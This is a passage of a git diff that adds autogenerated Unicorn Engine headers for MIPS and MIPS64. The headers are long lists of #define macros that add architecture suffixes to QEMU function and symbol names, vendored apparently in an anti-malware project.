helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips +#define helper_cmp_ps_olt helper_cmp_ps_olt_mips +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips +#define helper_cmp_ps_ult helper_cmp_ps_ult_mips +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips +#define helper_cmp_ps_ole helper_cmp_ps_ole_mips +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips +#define helper_cmp_ps_ule helper_cmp_ps_ule_mips +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips +#define helper_cmp_ps_sf helper_cmp_ps_sf_mips +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips +#define helper_cmp_ps_seq helper_cmp_ps_seq_mips +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips +#define helper_cmp_ps_lt helper_cmp_ps_lt_mips +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips +#define helper_cmp_ps_nge helper_cmp_ps_nge_mips +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips +#define helper_cmp_ps_le helper_cmp_ps_le_mips +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips +#define helper_msa_ld_df helper_msa_ld_df_mips +#define helper_msa_st_df helper_msa_st_df_mips +#define no_mmu_map_address no_mmu_map_address_mips +#define fixed_mmu_map_address fixed_mmu_map_address_mips +#define r4k_map_address r4k_map_address_mips +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mips +#define cpu_mips_translate_address cpu_mips_translate_address_mips +#define exception_resume_pc exception_resume_pc_mips +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips +#define r4k_invalidate_tlb r4k_invalidate_tlb_mips +#define helper_absq_s_ob helper_absq_s_ob_mips +#define helper_absq_s_qh helper_absq_s_qh_mips +#define helper_absq_s_pw helper_absq_s_pw_mips +#define helper_adduh_ob helper_adduh_ob_mips +#define helper_adduh_r_ob helper_adduh_r_ob_mips +#define helper_subuh_ob helper_subuh_ob_mips +#define helper_subuh_r_ob helper_subuh_r_ob_mips +#define helper_addq_pw helper_addq_pw_mips +#define helper_addq_qh helper_addq_qh_mips +#define helper_addq_s_pw helper_addq_s_pw_mips +#define helper_addq_s_qh helper_addq_s_qh_mips +#define helper_addu_ob helper_addu_ob_mips +#define helper_addu_qh helper_addu_qh_mips +#define helper_addu_s_ob helper_addu_s_ob_mips +#define helper_addu_s_qh helper_addu_s_qh_mips +#define helper_subq_pw helper_subq_pw_mips +#define helper_subq_qh helper_subq_qh_mips +#define helper_subq_s_pw helper_subq_s_pw_mips +#define helper_subq_s_qh helper_subq_s_qh_mips +#define helper_subu_ob helper_subu_ob_mips +#define helper_subu_qh helper_subu_qh_mips +#define helper_subu_s_ob helper_subu_s_ob_mips +#define helper_subu_s_qh helper_subu_s_qh_mips +#define helper_raddu_l_ob helper_raddu_l_ob_mips +#define helper_precr_ob_qh helper_precr_ob_qh_mips +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips +#define helper_precrq_ob_qh helper_precrq_ob_qh_mips +#define helper_precrq_qh_pw helper_precrq_qh_pw_mips +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips +#define helper_precrq_pw_l helper_precrq_pw_l_mips +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips +#define helper_precequ_qh_obl helper_precequ_qh_obl_mips +#define helper_precequ_qh_obr helper_precequ_qh_obr_mips +#define helper_precequ_qh_obla helper_precequ_qh_obla_mips +#define helper_precequ_qh_obra helper_precequ_qh_obra_mips +#define helper_preceu_qh_obl helper_preceu_qh_obl_mips +#define helper_preceu_qh_obr helper_preceu_qh_obr_mips +#define helper_preceu_qh_obla helper_preceu_qh_obla_mips +#define helper_preceu_qh_obra helper_preceu_qh_obra_mips +#define helper_shll_ob helper_shll_ob_mips +#define helper_shrl_ob helper_shrl_ob_mips +#define helper_shra_ob helper_shra_ob_mips +#define helper_shra_r_ob helper_shra_r_ob_mips +#define helper_shll_qh helper_shll_qh_mips +#define helper_shll_s_qh helper_shll_s_qh_mips +#define helper_shrl_qh helper_shrl_qh_mips +#define helper_shra_qh helper_shra_qh_mips +#define helper_shra_r_qh helper_shra_r_qh_mips +#define helper_shll_pw helper_shll_pw_mips +#define helper_shll_s_pw helper_shll_s_pw_mips +#define helper_shra_pw helper_shra_pw_mips +#define helper_shra_r_pw helper_shra_r_pw_mips +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips +#define helper_mulq_rs_qh helper_mulq_rs_qh_mips +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips +#define helper_dpau_h_obl helper_dpau_h_obl_mips +#define helper_dpau_h_obr helper_dpau_h_obr_mips +#define helper_dpsu_h_obl helper_dpsu_h_obl_mips +#define helper_dpsu_h_obr helper_dpsu_h_obr_mips +#define helper_dpa_w_qh helper_dpa_w_qh_mips +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips +#define helper_dps_w_qh helper_dps_w_qh_mips +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips +#define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips +#define helper_dmadd helper_dmadd_mips +#define helper_dmaddu helper_dmaddu_mips +#define helper_dmsub helper_dmsub_mips +#define helper_dmsubu helper_dmsubu_mips +#define helper_dinsv helper_dinsv_mips +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips +#define helper_cmpu_le_ob helper_cmpu_le_ob_mips +#define helper_cmp_eq_qh helper_cmp_eq_qh_mips +#define helper_cmp_lt_qh helper_cmp_lt_qh_mips +#define helper_cmp_le_qh helper_cmp_le_qh_mips +#define helper_cmp_eq_pw helper_cmp_eq_pw_mips +#define helper_cmp_lt_pw helper_cmp_lt_pw_mips +#define helper_cmp_le_pw helper_cmp_le_pw_mips +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips +#define helper_pick_ob helper_pick_ob_mips +#define helper_pick_qh helper_pick_qh_mips +#define helper_pick_pw helper_pick_pw_mips +#define helper_packrl_pw helper_packrl_pw_mips +#define helper_dextr_w helper_dextr_w_mips +#define helper_dextr_r_w helper_dextr_r_w_mips +#define helper_dextr_rs_w helper_dextr_rs_w_mips +#define helper_dextr_l helper_dextr_l_mips +#define helper_dextr_r_l helper_dextr_r_l_mips +#define helper_dextr_rs_l helper_dextr_rs_l_mips +#define helper_dextr_s_h helper_dextr_s_h_mips +#define helper_dextp helper_dextp_mips +#define helper_dextpdp helper_dextpdp_mips +#define helper_dshilo helper_dshilo_mips +#define helper_dmthlip helper_dmthlip_mips +#define helper_dclo helper_dclo_mips +#define helper_dclz helper_dclz_mips +#define helper_dbitswap helper_dbitswap_mips +#define helper_lld helper_lld_mips +#define helper_scd helper_scd_mips +#define helper_sdl helper_sdl_mips +#define helper_sdr helper_sdr_mips +#define helper_ldm helper_ldm_mips +#define helper_sdm helper_sdm_mips +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips +#define mips_reg_reset mips_reg_reset_mips +#define mips_reg_read mips_reg_read_mips +#define mips_reg_write mips_reg_write_mips +#define mips_tcg_init mips_tcg_init_mips +#define mips_cpu_list mips_cpu_list_mips +#define mips_release mips_release_mips +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mips +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mips +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mips64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64.h new file mode 100644 index 0000000..e464d4b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPS64_H +#define UNICORN_AUTOGEN_MIPS64_H +#define arm_release arm_release_mips64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mips64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mips64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_mips64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_mips64 +#define helper_power_down helper_power_down_mips64 +#define check_exit_request check_exit_request_mips64 +#define address_space_unregister address_space_unregister_mips64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64 +#define phys_mem_clean phys_mem_clean_mips64 +#define tb_cleanup tb_cleanup_mips64 +#define memory_map memory_map_mips64 +#define memory_map_ptr memory_map_ptr_mips64 +#define memory_unmap memory_unmap_mips64 +#define memory_free memory_free_mips64 +#define free_code_gen_buffer free_code_gen_buffer_mips64 +#define helper_raise_exception helper_raise_exception_mips64 +#define tcg_enabled tcg_enabled_mips64 +#define tcg_exec_init tcg_exec_init_mips64 +#define memory_register_types memory_register_types_mips64 +#define cpu_exec_init_all cpu_exec_init_all_mips64 +#define vm_start vm_start_mips64 +#define resume_all_vcpus resume_all_vcpus_mips64 +#define a15_l2ctlr_read a15_l2ctlr_read_mips64 +#define a64_translate_init a64_translate_init_mips64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mips64 +#define aa64_cacheop_access aa64_cacheop_access_mips64 +#define aa64_daif_access aa64_daif_access_mips64 +#define aa64_daif_write aa64_daif_write_mips64 +#define aa64_dczid_read aa64_dczid_read_mips64 +#define aa64_fpcr_read aa64_fpcr_read_mips64 +#define aa64_fpcr_write aa64_fpcr_write_mips64 +#define aa64_fpsr_read aa64_fpsr_read_mips64 +#define aa64_fpsr_write aa64_fpsr_write_mips64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mips64 +#define aa64_zva_access aa64_zva_access_mips64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mips64 +#define aarch64_restore_sp aarch64_restore_sp_mips64 +#define aarch64_save_sp aarch64_save_sp_mips64 +#define accel_find accel_find_mips64 +#define accel_init_machine accel_init_machine_mips64 +#define accel_type accel_type_mips64 +#define access_with_adjusted_size access_with_adjusted_size_mips64 +#define add128 add128_mips64 +#define add16_sat add16_sat_mips64 +#define add16_usat add16_usat_mips64 +#define add192 add192_mips64 +#define add8_sat add8_sat_mips64 +#define add8_usat add8_usat_mips64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mips64 +#define add_cpreg_to_list add_cpreg_to_list_mips64 +#define addFloat128Sigs addFloat128Sigs_mips64 +#define addFloat32Sigs addFloat32Sigs_mips64 +#define addFloat64Sigs addFloat64Sigs_mips64 +#define addFloatx80Sigs addFloatx80Sigs_mips64 +#define add_qemu_ldst_label add_qemu_ldst_label_mips64 +#define address_space_access_valid address_space_access_valid_mips64 +#define address_space_destroy address_space_destroy_mips64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_mips64 +#define address_space_get_flatview address_space_get_flatview_mips64 +#define address_space_init address_space_init_mips64 +#define address_space_init_dispatch address_space_init_dispatch_mips64 +#define address_space_lookup_region address_space_lookup_region_mips64 +#define address_space_map address_space_map_mips64 +#define address_space_read address_space_read_mips64 +#define address_space_rw address_space_rw_mips64 +#define address_space_translate address_space_translate_mips64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64 +#define address_space_translate_internal address_space_translate_internal_mips64 +#define address_space_unmap address_space_unmap_mips64 +#define address_space_update_topology address_space_update_topology_mips64 +#define address_space_update_topology_pass address_space_update_topology_pass_mips64 +#define address_space_write address_space_write_mips64 +#define addrrange_contains addrrange_contains_mips64 +#define addrrange_end addrrange_end_mips64 +#define addrrange_equal addrrange_equal_mips64 +#define addrrange_intersection addrrange_intersection_mips64 +#define addrrange_intersects addrrange_intersects_mips64 +#define addrrange_make addrrange_make_mips64 +#define adjust_endianness adjust_endianness_mips64 +#define all_helpers all_helpers_mips64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_mips64 +#define alloc_entry alloc_entry_mips64 +#define always_true always_true_mips64 +#define arm1026_initfn arm1026_initfn_mips64 +#define arm1136_initfn arm1136_initfn_mips64 +#define arm1136_r2_initfn arm1136_r2_initfn_mips64 +#define arm1176_initfn arm1176_initfn_mips64 +#define arm11mpcore_initfn arm11mpcore_initfn_mips64 +#define arm926_initfn arm926_initfn_mips64 +#define arm946_initfn arm946_initfn_mips64 +#define arm_ccnt_enabled arm_ccnt_enabled_mips64 +#define arm_cp_read_zero arm_cp_read_zero_mips64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_mips64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mips64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mips64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_mips64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mips64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mips64 +#define arm_cpu_initfn arm_cpu_initfn_mips64 +#define arm_cpu_list arm_cpu_list_mips64 +#define cpu_loop_exit cpu_loop_exit_mips64 +#define arm_cpu_post_init arm_cpu_post_init_mips64 +#define arm_cpu_realizefn arm_cpu_realizefn_mips64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mips64 +#define arm_cpu_register_types arm_cpu_register_types_mips64 +#define cpu_resume_from_signal cpu_resume_from_signal_mips64 +#define arm_cpus arm_cpus_mips64 +#define arm_cpu_set_pc arm_cpu_set_pc_mips64 +#define arm_cp_write_ignore arm_cp_write_ignore_mips64 +#define arm_current_el arm_current_el_mips64 +#define arm_dc_feature arm_dc_feature_mips64 +#define arm_debug_excp_handler arm_debug_excp_handler_mips64 +#define arm_debug_target_el arm_debug_target_el_mips64 +#define arm_el_is_aa64 arm_el_is_aa64_mips64 +#define arm_env_get_cpu arm_env_get_cpu_mips64 +#define arm_excp_target_el arm_excp_target_el_mips64 +#define arm_excp_unmasked arm_excp_unmasked_mips64 +#define arm_feature arm_feature_mips64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mips64 +#define gen_intermediate_code gen_intermediate_code_mips64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_mips64 +#define arm_gen_test_cc arm_gen_test_cc_mips64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mips64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mips64 +#define arm_handle_psci_call arm_handle_psci_call_mips64 +#define arm_is_psci_call arm_is_psci_call_mips64 +#define arm_is_secure arm_is_secure_mips64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mips64 +#define arm_ldl_code arm_ldl_code_mips64 +#define arm_lduw_code arm_lduw_code_mips64 +#define arm_log_exception arm_log_exception_mips64 +#define arm_reg_read arm_reg_read_mips64 +#define arm_reg_reset arm_reg_reset_mips64 +#define arm_reg_write arm_reg_write_mips64 +#define restore_state_to_opc restore_state_to_opc_mips64 +#define arm_rmode_to_sf arm_rmode_to_sf_mips64 +#define arm_singlestep_active arm_singlestep_active_mips64 +#define tlb_fill tlb_fill_mips64 +#define tlb_flush tlb_flush_mips64 +#define tlb_flush_page tlb_flush_page_mips64 +#define tlb_set_page tlb_set_page_mips64 +#define arm_translate_init arm_translate_init_mips64 +#define arm_v7m_class_init arm_v7m_class_init_mips64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mips64 +#define ats_access ats_access_mips64 +#define ats_write ats_write_mips64 +#define bad_mode_switch bad_mode_switch_mips64 +#define bank_number bank_number_mips64 +#define bitmap_zero_extend bitmap_zero_extend_mips64 +#define bp_wp_matches bp_wp_matches_mips64 +#define breakpoint_invalidate breakpoint_invalidate_mips64 +#define build_page_bitmap build_page_bitmap_mips64 +#define bus_add_child bus_add_child_mips64 +#define bus_class_init bus_class_init_mips64 +#define bus_info bus_info_mips64 +#define bus_unparent bus_unparent_mips64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mips64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mips64 +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mips64 +#define call_recip_estimate call_recip_estimate_mips64 +#define can_merge can_merge_mips64 +#define capacity_increase capacity_increase_mips64 +#define ccsidr_read ccsidr_read_mips64 +#define check_ap check_ap_mips64 +#define check_breakpoints check_breakpoints_mips64 +#define check_watchpoints check_watchpoints_mips64 +#define cho cho_mips64 +#define clear_bit clear_bit_mips64 +#define clz32 clz32_mips64 +#define clz64 clz64_mips64 +#define cmp_flatrange_addr cmp_flatrange_addr_mips64 +#define code_gen_alloc code_gen_alloc_mips64 +#define commonNaNToFloat128 commonNaNToFloat128_mips64 +#define commonNaNToFloat16 commonNaNToFloat16_mips64 +#define commonNaNToFloat32 commonNaNToFloat32_mips64 +#define commonNaNToFloat64 commonNaNToFloat64_mips64 +#define commonNaNToFloatx80 commonNaNToFloatx80_mips64 +#define compute_abs_deadline compute_abs_deadline_mips64 +#define cond_name cond_name_mips64 +#define configure_accelerator configure_accelerator_mips64 +#define container_get container_get_mips64 +#define container_info container_info_mips64 +#define container_register_types container_register_types_mips64 +#define contextidr_write contextidr_write_mips64 +#define core_log_global_start core_log_global_start_mips64 +#define core_log_global_stop core_log_global_stop_mips64 +#define core_memory_listener core_memory_listener_mips64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mips64 +#define cortex_a15_initfn cortex_a15_initfn_mips64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mips64 +#define cortex_a8_initfn cortex_a8_initfn_mips64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mips64 +#define cortex_a9_initfn cortex_a9_initfn_mips64 +#define cortex_m3_initfn cortex_m3_initfn_mips64 +#define count_cpreg count_cpreg_mips64 +#define countLeadingZeros32 countLeadingZeros32_mips64 +#define countLeadingZeros64 countLeadingZeros64_mips64 +#define cp_access_ok cp_access_ok_mips64 +#define cpacr_write cpacr_write_mips64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_mips64 +#define cp_reginfo cp_reginfo_mips64 +#define cpreg_key_compare cpreg_key_compare_mips64 +#define cpreg_make_keylist cpreg_make_keylist_mips64 +#define cp_reg_reset cp_reg_reset_mips64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_mips64 +#define cpsr_read cpsr_read_mips64 +#define cpsr_write cpsr_write_mips64 +#define cptype_valid cptype_valid_mips64 +#define cpu_abort cpu_abort_mips64 +#define cpu_arm_exec cpu_arm_exec_mips64 +#define cpu_arm_gen_code cpu_arm_gen_code_mips64 +#define cpu_arm_init cpu_arm_init_mips64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_mips64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_mips64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64 +#define cpu_can_do_io cpu_can_do_io_mips64 +#define cpu_can_run cpu_can_run_mips64 +#define cpu_class_init cpu_class_init_mips64 +#define cpu_common_class_by_name cpu_common_class_by_name_mips64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mips64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_mips64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mips64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mips64 +#define cpu_common_has_work cpu_common_has_work_mips64 +#define cpu_common_initfn cpu_common_initfn_mips64 +#define cpu_common_noop cpu_common_noop_mips64 +#define cpu_common_parse_features cpu_common_parse_features_mips64 +#define cpu_common_realizefn cpu_common_realizefn_mips64 +#define cpu_common_reset cpu_common_reset_mips64 +#define cpu_dump_statistics cpu_dump_statistics_mips64 +#define cpu_exec_init cpu_exec_init_mips64 +#define cpu_flush_icache_range cpu_flush_icache_range_mips64 +#define cpu_gen_init cpu_gen_init_mips64 +#define cpu_get_clock cpu_get_clock_mips64 +#define cpu_get_real_ticks cpu_get_real_ticks_mips64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mips64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_mips64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_mips64 +#define cpu_inb cpu_inb_mips64 +#define cpu_inl cpu_inl_mips64 +#define cpu_interrupt cpu_interrupt_mips64 +#define cpu_interrupt_handler cpu_interrupt_handler_mips64 +#define cpu_inw cpu_inw_mips64 +#define cpu_io_recompile cpu_io_recompile_mips64 +#define cpu_is_stopped cpu_is_stopped_mips64 +#define cpu_ldl_code cpu_ldl_code_mips64 +#define cpu_ldub_code cpu_ldub_code_mips64 +#define cpu_lduw_code cpu_lduw_code_mips64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_mips64 +#define cpu_mmu_index cpu_mmu_index_mips64 +#define cpu_outb cpu_outb_mips64 +#define cpu_outl cpu_outl_mips64 +#define cpu_outw cpu_outw_mips64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mips64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mips64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mips64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mips64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mips64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64 +#define cpu_physical_memory_map cpu_physical_memory_map_mips64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mips64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mips64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_mips64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mips64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mips64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mips64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mips64 +#define cpu_register cpu_register_mips64 +#define cpu_register_types cpu_register_types_mips64 +#define cpu_restore_state cpu_restore_state_mips64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mips64 +#define cpu_single_step cpu_single_step_mips64 +#define cpu_tb_exec cpu_tb_exec_mips64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mips64 +#define cpu_to_be64 cpu_to_be64_mips64 +#define cpu_to_le32 cpu_to_le32_mips64 +#define cpu_to_le64 cpu_to_le64_mips64 +#define cpu_type_info cpu_type_info_mips64 +#define cpu_unassigned_access cpu_unassigned_access_mips64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_mips64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_mips64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64 +#define crc32c_table crc32c_table_mips64 +#define create_new_memory_mapping create_new_memory_mapping_mips64 +#define csselr_write csselr_write_mips64 +#define cto32 cto32_mips64 +#define ctr_el0_access ctr_el0_access_mips64 +#define ctz32 ctz32_mips64 +#define ctz64 ctz64_mips64 +#define dacr_write dacr_write_mips64 +#define dbgbcr_write dbgbcr_write_mips64 +#define dbgbvr_write dbgbvr_write_mips64 +#define dbgwcr_write dbgwcr_write_mips64 +#define dbgwvr_write dbgwvr_write_mips64 +#define debug_cp_reginfo debug_cp_reginfo_mips64 +#define debug_frame debug_frame_mips64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mips64 +#define define_arm_cp_regs define_arm_cp_regs_mips64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mips64 +#define define_debug_regs define_debug_regs_mips64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_mips64 +#define 